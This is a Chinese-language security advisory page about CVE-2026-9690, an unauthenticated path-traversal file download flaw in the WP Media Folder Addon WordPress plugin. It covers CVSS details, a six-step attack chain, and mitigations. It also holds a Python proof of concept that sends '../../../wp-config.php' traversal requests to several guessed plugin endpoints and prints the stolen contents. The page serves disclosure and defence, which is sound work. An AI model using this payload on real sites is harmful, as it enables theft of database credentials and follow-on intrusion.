IPBUF安全漏洞报告
English
CVE-2026-9690 CVSS 7.5 高危

CVE-2026-9690 WP Media Folder Addon插件未认证任意文件下载漏洞

披露日期: 2026-06-17

漏洞信息

漏洞编号
CVE-2026-9690
漏洞类型
任意文件下载(Arbitrary File Download)
CVSS评分
7.5 高危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
WP Media Folder Addon(WordPress插件)

相关标签

任意文件下载Arbitrary File DownloadWordPressWP Media Folder Addon未认证漏洞Unauthenticated目录遍历Path Traversal信息泄露高危漏洞

漏洞概述

CVE-2026-9690是存在于WordPress插件WP Media Folder Addon中的一个高危安全漏洞。该漏洞允许未经认证的远程攻击者通过构造特定的请求,下载服务器上的任意文件,包括敏感的系统配置文件、数据库凭证、WordPress配置文件(wp-config.php)以及其它包含机密信息的文件。

该漏洞由Patchstack安全团队的研究员[email protected]发现并报告,披露日期为2026年6月17日。根据CVSS 3.1评分体系,该漏洞获得7.5分(满分10分),属于高危级别。其CVSS向量为CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N,表明该漏洞可通过网络远程利用,攻击复杂度低,无需任何特权或用户交互即可触发,对机密性产生高影响,但不影响完整性和可用性。

WP Media Folder Addon是WordPress中广泛使用的一款媒体管理插件,用于增强WordPress默认的媒体库功能,提供文件夹管理、文件同步、媒体分类等扩展能力。由于该插件通常被部署在大量WordPress网站上,且该漏洞无需认证即可利用,因此其潜在影响范围非常广泛。攻击者可以利用此漏洞窃取网站的敏感配置文件,获取数据库连接凭证,进而进一步入侵网站或窃取用户数据。

该漏洞影响WP Media Folder Addon 4.0.1及以下的所有版本。受影响用户应及时将插件升级至4.0.2或更高版本以修复此安全漏洞。

技术细节

WP Media Folder Addon插件中存在任意文件下载漏洞的根本原因在于插件对用户提供的文件路径参数缺乏充分的验证和过滤。插件中可能存在一个用于下载或读取媒体文件的接口(如AJAX端点或REST API端点),该接口接收用户传入的文件路径或文件ID参数,并直接用于文件读取操作,而未对路径进行严格的合法性校验。

攻击者可以通过构造包含目录遍历序列(如../)或绝对路径的恶意请求,绕过插件预期的文件下载逻辑,访问Web服务器上任意可读的文件。常见的攻击向量包括修改请求参数中的文件路径字段,加入路径遍历字符,从而读取如wp-config.php(包含数据库用户名、密码、认证密钥等敏感信息)、.htaccess、/etc/passwd等关键文件。

由于该漏洞无需任何认证(PR:N)且无需用户交互(UI:N),攻击者可以完全自动化地批量扫描和利用存在漏洞的WordPress站点。攻击复杂度低(AC:L),仅需向目标站点的特定端点发送精心构造的HTTP请求即可完成攻击。一旦成功利用,攻击者可获取站点的核心配置文件,为后续的深度入侵(如数据库入侵、权限提升、网站篡改等)奠定基础。

该漏洞的利用通常通过HTTP GET或POST请求完成,攻击者只需定位到插件暴露的文件下载端点,传入恶意路径参数即可下载目标文件。

攻击链分析

STEP 1
步骤1:目标识别
攻击者通过搜索引擎(如Google dorks)或WordPress指纹识别工具,扫描互联网上部署了WP Media Folder Addon插件(版本<=4.0.1)的WordPress网站。
STEP 2
步骤2:漏洞端点探测
攻击者定位插件暴露的文件下载端点(AJAX端点或特定PHP文件),分析其请求参数结构,确定文件路径参数的注入点。
STEP 3
步骤3:构造恶意请求
攻击者构造包含目录遍历序列(如../../../wp-config.php)的HTTP请求,利用路径遍历绕过文件访问限制。
STEP 4
步骤4:发送未认证请求
由于该漏洞无需认证,攻击者直接向目标端点发送恶意HTTP请求,无需任何凭据或会话令牌。
STEP 5
步骤5:下载敏感文件
服务器返回请求的文件内容,攻击者成功下载wp-config.php等敏感配置文件,获取数据库凭证、认证密钥等机密信息。
STEP 6
步骤6:进一步入侵
攻击者利用获取的数据库凭证连接WordPress数据库,窃取用户数据、注入恶意内容,或进一步提权控制整个服务器。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
# CVE-2026-9690 - WP Media Folder Addon Unauthenticated Arbitrary File Download PoC # Affected: WP Media Folder Addon <= 4.0.1 # Type: Arbitrary File Download (Unauthenticated) import requests import sys # Target configuration TARGET_URL = sys.argv[1] if len(sys.argv) > 1 else "http://target-wordpress-site.com" FILE_TO_DOWNLOAD = sys.argv[2] if len(sys.argv) > 2 else "../../../wp-config.php" # Common vulnerable endpoints in WP Media Folder Addon plugin endpoints = [ "/wp-admin/admin-ajax.php", "/wp-json/wpmfa/v1/download", "/wp-content/plugins/wp-media-folder-addon/includes/download.php" ] def exploit_arbitrary_file_download(target_url, file_path, endpoint): """ Exploit arbitrary file download vulnerability by sending crafted request with directory traversal payload to the vulnerable endpoint. """ params = { "action": "wpmfa_download_file", "file": file_path, "path": file_path } try: response = requests.get( f"{target_url}{endpoint}", params=params, timeout=10, verify=False ) if response.status_code == 200 and len(response.content) > 0: # Check if response contains PHP config markers (indicating successful wp-config.php download) if b"DB_NAME" in response.content or b"<?php" in response.content: print(f"[+] Vulnerability confirmed! File downloaded successfully via {endpoint}") print(f"[+] Content preview:\n{response.text[:500]}") return True return False except Exception as e: print(f"[-] Error: {e}") return False if __name__ == "__main__": print(f"[*] Targeting: {TARGET_URL}") print(f"[*] Attempting to download: {FILE_TO_DOWNLOAD}") for endpoint in endpoints: print(f"\n[*] Trying endpoint: {endpoint}") if exploit_arbitrary_file_download(TARGET_URL, FILE_TO_DOWNLOAD, endpoint): print("[+] Exploit successful!") sys.exit(0) print("[-] Exploit failed - target may not be vulnerable")

影响范围

WP Media Folder Addon <= 4.0.1

防御指南

临时缓解措施
在无法立即升级插件的情况下,建议采取以下临时缓解措施:1)通过修改.htaccess或Nginx配置,限制对插件文件下载端点的访问;2)部署WAF规则,阻断包含目录遍历字符(../、..%2f等)的恶意请求;3)暂时停用WP Media Folder Addon插件,直到完成升级;4)监控服务器日志,识别可能的利用尝试;5)对wp-config.php等关键敏感文件进行权限收紧,防止被Web进程读取。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表